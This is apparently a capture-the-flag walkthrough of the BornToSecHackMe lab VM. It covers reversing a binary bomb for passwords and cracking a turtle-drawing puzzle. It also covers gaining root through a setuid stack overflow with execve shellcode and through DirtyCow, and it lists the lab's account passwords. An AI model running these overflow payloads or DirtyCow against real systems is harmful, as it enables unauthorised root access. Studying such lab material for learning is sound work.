            ++j;
        }
        ++i;
    } while (i < 6);
    int *nodePtr1;
    int *nodePtr2;
    int *nbs2[6];
    // nbs2[i] = the nbs[i]-th node of the list starting at node1
    i = 0;
    do {
        j = 1;
        nodePtr1 = node1;
        if (nbs[i] > 1) {
            do {
                nodePtr1 = NEXT(nodePtr1);
                ++j;
            } while (j < nbs[i]);
        }
        nbs2[i] = nodePtr1;
        ++i;
    } while (i < 6);
    // relink the nodes in the order given by the input
    i = 1;
    nodePtr1 = nbs2[0];
    do {
        nodePtr2 = nbs2[i];
        nodePtr1[2] = (int)(intptr_t)nodePtr2;
        ++i;
        nodePtr1 = nodePtr2;
    } while (i < 6);
    nodePtr2[2] = 0;
    // the relinked list must be in descending order of value
    i = 0;
    do {
        if (*nbs2[0] < *NEXT(nbs2[0])) {
            explode_bomb();
        }
        nbs2[0] = NEXT(nbs2[0]);
        ++i;
    } while (i < 5);
}
```
The function expects to read 5 numbers as input.
The first do/while forces the numbers to lie between `1 and 6` and to all be different.
Depending on the number entered, the program stores the value of the corresponding node in an array of 6 entries:
for `1`: `node1`, for `2`: `node2`, etc.
```
nbs2[0] = node{nbs[0]}
nbs2[1] = node{nbs[1]}
...
nbs2[5] = node{nbs[5]}
```
The last loop checks that the `nbs2` array is sorted in descending order, otherwise it blows up the bomb.
The node values can be retrieved like this:
```
(gdb) x/3d &node1
0x804b26c <node1>: 253 1 134525500
(gdb) x/3d &node2
0x804b260 <node2>: 725 2 134525488
(gdb) x/3d &node3
0x804b254 <node3>: 301 3 134525548
(gdb) x/3d &node4
0x804b248 <node4>: 997 4 134525536
(gdb) x/3d &node5
0x804b23c <node5>: 212 5 0
(gdb) x/3d &node6
0x804b230 <node6>: 432 6 134525524
```
So we just have to give the 6 node indexes in the right order.
```
4: 0x804b248 <node4>: 997
2: 0x804b260 <node2>: 725
6: 0x804b230 <node6>: 432
3: 0x804b254 <node3>: 301
1: 0x804b26c <node1>: 253
5: 0x804b23c <node5>: 212
```
So: `4 2 6 3 1 5`
```bash
$> vim test
1 Public speaking is very easy.
2 1 2 6 24 120 720
3 1 b 214
4 9
5 opekma
6 4 2 6 3 1 5
$> ./bomb test
Welcome this is my little bomb !!!! You have 6 stages with
only one life good luck !! Have a nice day!
Phase 1 defused. How about the next one?
That's number 2. Keep going!
Halfway there!
So you got that one. Try this one.
Good work! On to the next...
Congratulations! You've defused the bomb!
```
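Added example (not from the write-up): a Python model of the `phase_6` checks using the node values read with gdb above. It applies the range and uniqueness checks of the first loop, then the descending-order check of the last loop, and searches all 720 orderings to confirm `4 2 6 3 1 5` is the only one that defuses.

```python
import itertools

# node values from the gdb dump above: list index -> value
NODES = {1: 253, 2: 725, 3: 301, 4: 997, 5: 212, 6: 432}

def phase_6_check(nbs):
    """Model of phase_6: True if the six indexes would defuse, False if the bomb explodes."""
    if len(nbs) != 6:
        return False                      # read_six_numbers() needs six numbers
    # first loop: each number in 1..6, and no two equal
    if any(not 1 <= n <= 6 for n in nbs) or len(set(nbs)) != 6:
        return False
    # the list is relinked in the given order; the last loop explodes as soon
    # as a node's value is smaller than the value of the node that follows it
    values = [NODES[n] for n in nbs]
    return all(a >= b for a, b in zip(values, values[1:]))

def phase_6_solutions():
    """Every ordering of 1..6 that passes phase_6."""
    return [list(p) for p in itertools.permutations(range(1, 7)) if phase_6_check(list(p))]
```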
`b *main+346`
#### Enter secret phase
```c
void phase_defused(void) {
    int iVar1;
    undefined local_58[4];
    char secretStr[80];
    if (num_input_strings == 6) {
        iVar1 = sscanf(input_strings + 0xf0, "%d %s", local_58, secretStr);
        if (iVar1 == 2) {
            iVar1 = strings_not_equal(secretStr, "austinpowers");
            if (iVar1 == 0) {
                printf("Curses, you\'ve found the secret phase!\n");
                printf("But finding it and solving it are quite different...\n");
                secret_phase();
            }
        }
        printf("Congratulations! You\'ve defused the bomb!\n");
    }
    return;
}
```
```
iVar1 = sscanf(input_strings + 0xf0, "%d %s", local_58, secretStr);
if (iVar1 == 2) {
iVar1 = strings_not_equal(secretStr,"austinpowers");
...
```
`input_strings + 0xf0` points at the phase 4 input, "9".
So if we put "austinpowers" after the phase 4 input `9`, we enter the secret phase.
```bash
$> vim test
1 Public speaking is very easy.
2 1 2 6 24 120 720
3 1 b 214
4 9 austinpowers
5 opekma
6 4 2 6 3 1 5
$> ./bomb test
Welcome this is my little bomb !!!! You have 6 stages with
only one life good luck !! Have a nice day!
Phase 1 defused. How about the next one?
That's number 2. Keep going!
Halfway there!
So you got that one. Try this one.
Good work! On to the next...
Curses, you've found the secret phase!
But finding it and solving it are quite different...
```
#### Solving secret phase
```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

void explode_bomb(void);
void phase_defused(void);
char *read_line(void);

/* root of the tree: { value, address of left child, address of right child, ... } */
int n1[8] = { 36, 134525716, 134525704, 0, 0, 0, 0, 0 };

int fun7(int *param_1, int param_2) {
    if (param_1 == NULL) {
        return -1;
    }
    int res;
    if (param_2 < *param_1) {
        // go left
        res = fun7((int *)(intptr_t)param_1[1], param_2);
        res = res * 2;
    }
    else {
        if (param_2 == *param_1) {
            res = 0;
        }
        else {
            // go right
            res = fun7((int *)(intptr_t)param_1[2], param_2);
            res = res * 2 + 1;
        }
    }
    return res;
}

void secret_phase(void) {
    char *str;
    int nb;
    str = read_line();
    nb = strtol(str, 0, 10);  // __strtol_internal(str, 0, 10, 0) in the binary
    // unsigned compare: rejects 0 and anything above 1001
    if ((unsigned)(nb - 1) > 1000) {
        explode_bomb();
    }
    nb = fun7(n1, nb);
    if (nb != 7) {
        explode_bomb();
    }
    printf("Wow! You\'ve defused the secret stage!\n");
    phase_defused();
}
```
`long int strtol (const char* str, char** endptr, int base);`
Parses the C-string `str`, interpreting its content as an integral number of the specified base.
> `str`: C-string beginning with the representation of an integral number.
> `endptr`: reference to an object of type `char*`, whose value is set by the function to the next character in `str` after the numerical value. This parameter can also be a null pointer, in which case it is not used.
> `base`: numerical base (radix) that determines the valid characters and their interpretation. If this is 0, the base used is determined by the format in the sequence.
---
The input number needs to be `<= 1001` and `fun7(n1, nb) == 7`.
We want `fun7` to return 7. We can achieve this by going through `res = res * 2 + 1;` three times:
```
0 * 2 + 1 1
1 * 2 + 1 3
3 * 2 + 1 7
```
---
##### 1st recursion
`int *n1 = { 36, 134525716, 134525704, 0, 0, 0, 0, 0 };`
n1[2]:
```
x/4d 134525704
int *n22 = { 50, 134525680, 134525656, 8 }
```
##### 2nd recursion
n22[2]:
```
x/4d 134525656
int *n34 = { 107, 134525620, 134525560, 6 }
```
##### 3rd recursion
n34[2]:
```
x/4d 134525560
int *n48 = { 1001, 0, 0, 47 }
```
At the 3rd recursion `param_1[0] == 1001`, so we need to send 1001 to stop the recursion and return 0.
```bash
$> ./bomb test
Welcome this is my little bomb !!!! You have 6 stages with
only one life good luck !! Have a nice day!
Phase 1 defused. How about the next one?
That's number 2. Keep going!
Halfway there!
So you got that one. Try this one.
Good work! On to the next...
Curses, you've found the secret phase!
But finding it and solving it are quite different...
1001
Wow! You've defused the secret stage!
Congratulations! You've defused the bomb!
```
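Added example (not from the write-up): a Python model of `fun7` over the tree nodes recovered with gdb above, keyed by address. Only the right spine from `n1` down to the 1001 leaf is on the page, so the left children are modelled as null; that is enough, because a result of 7 (binary 111) requires exactly three "go right" steps from the root followed by an exact match. The search then confirms 1001 is the only value in the accepted range.

```python
# Tree nodes from the gdb dumps above: address -> (value, left address, right address).
# The root is referenced by name since its address is not on the page.
ROOT = "n1"
TREE = {
    ROOT:      (36,   134525716, 134525704),   # n1
    134525704: (50,   134525680, 134525656),   # n22
    134525656: (107,  134525620, 134525560),   # n34
    134525560: (1001, 0,         0),           # n48 (leaf)
}

def fun7(addr, target):
    """Model of fun7: encodes the path to `target`; -1 for a null (or unknown) node."""
    node = TREE.get(addr)
    if node is None:                  # null pointer, or a subtree the dump does not cover
        return -1
    value, left, right = node
    if target < value:
        return fun7(left, target) * 2           # go left
    if target == value:
        return 0                                # found
    return fun7(right, target) * 2 + 1          # go right

def secret_phase_ok(n):
    """secret_phase accepts n when (unsigned)(n - 1) <= 1000 and fun7 returns 7."""
    if not 1 <= n <= 1001:
        return False
    return fun7(ROOT, n) == 7

def secret_solutions():
    """Every accepted input in the range the unsigned check allows."""
    return [n for n in range(1, 1002) if secret_phase_ok(n)]
```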
## "thor" password
The README:
```
Diffuse this bomb!
When you have all the password use it as "thor" user with ssh.
HINT:
P
2
b
o
4
NO SPACE IN THE PASSWORD (password is case sensitive).
```
The phases' "passwords":
```
Public speaking is very easy.
1 2 6 24 120 720
1 b 214
9 austinpowers
opekma
4 2 6 3 1 5
```
> for phase 5 there are several possibilities: opekma, opukma, opukmq or opekmq
We tried different combinations without success (Permission denied, please try again.):
```
Publicspeakingisveryeasy.126241207201b2149austinpowersopekma426315
Publicspeakingisveryeasy.126241207201b2149austinpowersopekma4263151001
Publicspeakingisveryeasy.126241207201b2149opekma426315
Publicspeakingisveryeasy.126241207201b2149opekma4263151001
Publicspeakingisveryeasy.126241207201b2149austinpowersopukma426315
Publicspeakingisveryeasy.126241207201b2149austinpowersopukma4263151001
Publicspeakingisveryeasy.126241207201b2149opukma426315
Publicspeakingisveryeasy.126241207201b2149opukma4263151001
Publicspeakingisveryeasy.126241207201b2149austinpowersopukmq426315
Publicspeakingisveryeasy.126241207201b2149austinpowersopukmq4263151001
Publicspeakingisveryeasy.126241207201b2149opukmq426315
Publicspeakingisveryeasy.126241207201b2149opukmq4263151001
Publicspeakingisveryeasy.126241207201b2149austinpowersopekmq426315
Publicspeakingisveryeasy.126241207201b2149austinpowersopekmq4263151001
Publicspeakingisveryeasy.126241207201b2149opekmq426315
Publicspeakingisveryeasy.126241207201b2149opekmq4263151001
```
We eventually found a post on stackoverflow: there is an error in the exercise, and the two characters before the last one must be swapped
315 -> 135
> https://stackoverflow.com/c/42network/questions/664
Which gives us: `Publicspeakingisveryeasy.126241207201b2149opekmq426135`
```bash
ssh thor@192.168.1.36
____ _______ _____
| _ \ |__ __| / ____|
| |_) | ___ _ __ _ __ | | ___| (___ ___ ___
| _ < / _ \| '__| '_ \| |/ _ \\___ \ / _ \/ __|
| |_) | (_) | | | | | | | (_) |___) | __/ (__
|____/ \___/|_| |_| |_|_|\___/_____/ \___|\___|
Good luck & Have fun
thor@192.168.1.36's password: Publicspeakingisveryeasy.126241207201b2149opekmq426135
thor@BornToSecHackMe:~$
```
## Thor Account
```bash
$> cat README
Finish this challenge and use the result as password for 'zaz' user.
$> cat turtle
Tourne gauche de 90 degrees
Avance 50 spaces
Avance 1 spaces
Tourne gauche de 1 degrees
Avance 1 spaces
...
Tourne droite de 90 degrees
Avance 100 spaces
Recule 200 spaces
Can you digest the message? :)
```
Turtle is the name of a Python graphics library, and the instructions in the file look like its commands.
> https://docs.python.org/3/library/turtle.html
So I wrote a Python script to parse the instructions and draw the path:
```python=
import turtle

turtle.speed('fastest')
turtle.pendown()
turtleFile = open("turtle").read()
for line in turtleFile.splitlines():
    lineSp = line.split()
    if len(lineSp) > 0:
        if lineSp[0] == 'Tourne':
            # "Tourne gauche|droite de N degrees"
            left = lineSp[1] == 'gauche'
            angle = int(lineSp[3])
            if left:
                turtle.left(angle)
            else:
                turtle.right(angle)
        elif lineSp[0] == 'Avance':
            # "Avance N spaces"
            length = int(lineSp[1])
            turtle.forward(length)
        elif lineSp[0] == 'Recule':
            # "Recule N spaces"
            length = int(lineSp[1])
            turtle.backward(length)
        else:
            # any other line: lift the pen and shift 200 to the right
            turtle.penup()
            tp = turtle.pos()
            turtle.setpos(turtle.Vec2D(tp[0] + 200, tp[1]))
            turtle.pendown()
turtle.done()
```

```bash
zaz@192.168.1.36's password: slash/SLASH
Permission denied, please try again.
```
At the end of the `turtle` file there is the sentence `"Can you digest the message? :)"`; "message digest" sometimes refers to hashes, so I tried passing the password through md5 and bingo, that was it 🎉.
```bash
su zaz
Password: 646da671ca01bb5d84dbb5fb2238dc8e
zaz@BornToSecHackMe:~$
```
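As an added example (not the page's own script), here is the same instruction format replayed headlessly, so it runs without a display, together with the md5 step suggested by the "digest" hint; the six-line input is constructed and only draws an "L" shape.

```python
import hashlib
import math

# Constructed sample in the same format as the page's `turtle` file (the
# real one is much longer); these six lines just draw an "L" shape.
SAMPLE = """\
Tourne gauche de 90 degrees
Avance 50 spaces
Tourne droite de 90 degrees
Avance 100 spaces
Recule 200 spaces
Can you digest the message? :)
"""

def trace_path(text, start=(0, 0)):
    """Replay Tourne/Avance/Recule instructions without a display.

    Returns the visited points (rounded to integers) and the final heading
    in degrees; heading 0 is east and "gauche" turns counter-clockwise,
    matching the turtle module's defaults.
    """
    x, y = start
    heading = 0
    points = [(x, y)]
    for line in text.splitlines():
        words = line.split()
        if not words:
            continue
        if words[0] == "Tourne":       # "Tourne gauche|droite de N degrees"
            angle = int(words[3])
            heading = (heading + angle if words[1] == "gauche" else heading - angle) % 360
            continue
        if words[0] == "Avance":       # "Avance N spaces"
            dist = int(words[1])
        elif words[0] == "Recule":     # "Recule N spaces"
            dist = -int(words[1])
        else:
            continue                   # the closing hint line is not a move
        rad = math.radians(heading)
        x += dist * math.cos(rad)
        y += dist * math.sin(rad)
        points.append((round(x), round(y)))
    return points, heading

def md5_digest(word):
    """Hex MD5 of a candidate password: the "digest" the hint points at."""
    return hashlib.md5(word.encode()).hexdigest()
```

Feeding the real `turtle` file to `trace_path` gives the vertex list of the drawing, which can be plotted or just inspected to read the word before hashing it.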
## Zaz account
```bash
ls -l
total 5
-rwsr-s--- 1 root zaz 4880 Oct 8 2015 exploit_me
drwxr-x--- 3 zaz zaz 107 Oct 8 2015 mail
```
```bash
zaz@BornToSecHackMe:~$ file ./exploit_me
./exploit_me: setuid setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x2457e2f88d6a21c3893bc48cb8f2584bcd39917e, not stripped
zaz@BornToSecHackMe:~$ ./exploit_me AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
```
The program segfaults when we pass a large argument; if this is a stack buffer overflow, let's find the offset at which the saved EIP gets overwritten.
For the sake of simplicity, we used this website https://projects.jason-rush.com/tools/buffer-overflow-eip-offset-string-generator/ to generate our pattern string
```bash
zaz@BornToSecHackMe:~$ gdb ./exploit_me
GNU gdb (Ubuntu/Linaro 7.4-2012.04-0ubuntu2.1) 7.4-2012.04
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://bugs.launchpad.net/gdb-linaro/>...
Reading symbols from /home/zaz/exploit_me...(no debugging symbols found)...done.
(gdb) r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
Starting program: /home/zaz/exploit_me Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
Program received signal SIGSEGV, Segmentation fault.
0x37654136 in ?? ()
```
- Entering `0x37654136` in the step 2 section of the website gives offset 140: this is the position at which the stored EIP starts being overwritten
- Store our shellcode in the environment, preceded by a large enough nopsled
```bash
zaz@BornToSecHackMe:~$ export SHELLCODE=$(python -c 'print "\x90" * 1000')$(echo -n -e '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80')
```
- Grab the environment start address: `0xbffff87d`
```bash
zaz@BornToSecHackMe:~$ gdb ./exploit_me
GNU gdb (Ubuntu/Linaro 7.4-2012.04-0ubuntu2.1) 7.4-2012.04
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://bugs.launchpad.net/gdb-linaro/>...
Reading symbols from /home/zaz/exploit_me...(no debugging symbols found)...done.
(gdb) r A^CQuit
(gdb) b main
Breakpoint 1 at 0x80483f7
(gdb) r A
Starting program: /home/zaz/exploit_me A
Breakpoint 1, 0x080483f7 in main ()
(gdb) print *((char **)environ)
$1 = 0xbffff87d "SHELLCODE=\220..."
```
- Run the program and overwrite EIP with an address inside the nopsled of our shellcode
```bash
zaz@BornToSecHackMe:~$ python -c 'print hex(0xbffff87d - 50)'
0xbffff84bL
zaz@BornToSecHackMe:~$ ./exploit_me $(python -c 'print "A"*140')$(echo -n -e '\x4b\xf8\xff\xbf')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAK���
# ls -la
total 12
drwxr-x--- 4 zaz zaz 147 Oct 15 2015 .
drwxrwx--x 1 www-data root 60 Oct 13 2015 ..
-rwxr-x--- 1 zaz zaz 1 Oct 15 2015 .bash_history
-rwxr-x--- 1 zaz zaz 220 Oct 8 2015 .bash_logout
-rwxr-x--- 1 zaz zaz 3489 Oct 13 2015 .bashrc
drwx------ 2 zaz zaz 43 Oct 14 2015 .cache
-rwxr-x--- 1 zaz zaz 675 Oct 8 2015 .profile
-rwxr-x--- 1 zaz zaz 1342 Oct 15 2015 .viminfo
-rwsr-s--- 1 root zaz 4880 Oct 8 2015 exploit_me
drwxr-x--- 3 zaz zaz 107 Oct 8 2015 mail
# whoami
root
#
```
---
# 2 Try to exploit an Ubuntu vulnerability
```bash
> lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 12.04.5 LTS
Release: 12.04
Codename: precise
> uname -r
3.2.0-91-generic-pae
```
## Try Dirtycow
```bash
./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 41284
Racing, this may take a while..
thread stopped
thread stopped
... <- infinite loop
```
> https://www.exploit-db.com/exploits/40839
```bash
laurie@BornToSecHackMe:~$ gcc -pthread dirty.c -o dirty -lcrypt
laurie@BornToSecHackMe:~$ ./dirty root
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: root
Complete line:
root:fiw.I6FqpfXW.:0:0:pwned:/root:/bin/bash
mmap: b7fda000
^C
laurie@BornToSecHackMe:~$ su root
Password: root
root@BornToSecHackMe:/home/laurie# cd
root@BornToSecHackMe:~# ls
README
root@BornToSecHackMe:~# cat README
CONGRATULATIONS !!!!
To be continued...
```
# Try to access other accounts
List of users with a home directory
```bash
$> awk -F: '$6 ~ /\/home/ {print}' /etc/passwd | awk -F: '{ print $1}'
syslog
ft_root
lmezard
laurie@borntosec.net
laurie
thor
zaz
```
The only accounts we don't know yet are `syslog` and `ft_root`
## syslog
## ft_root
## Try bomb secret password
`austinpowers1001`
md5: `88f6e10c8ac682687db9b47dde12b008`
`1001`
md5: `b8c37e33defde51cf91e1e03e51657da`
# chat / notes
laurie
330b845f32185747e4f8ca15d40ca59796035c89ea809fb5d30f4da83ecf45a4
thor:
Publicspeakingisveryeasy.126241207201b2149opekmq426135
zaz:
646da671ca01bb5d84dbb5fb2238dc8e